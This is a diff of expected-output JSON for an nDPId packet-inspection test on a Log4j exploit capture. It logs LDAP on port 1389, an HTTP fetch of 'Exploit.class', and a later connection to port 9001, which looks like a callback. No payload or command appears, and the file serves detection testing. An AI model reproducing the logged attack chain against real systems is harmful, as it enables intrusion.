protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIBgABCAAGBAABAkJ2jzQWrBDuAQAAAAAAAKwQ7go="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAACAkKsEO4KrBDuCgJCdo80FqwQ7gE="} -00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} 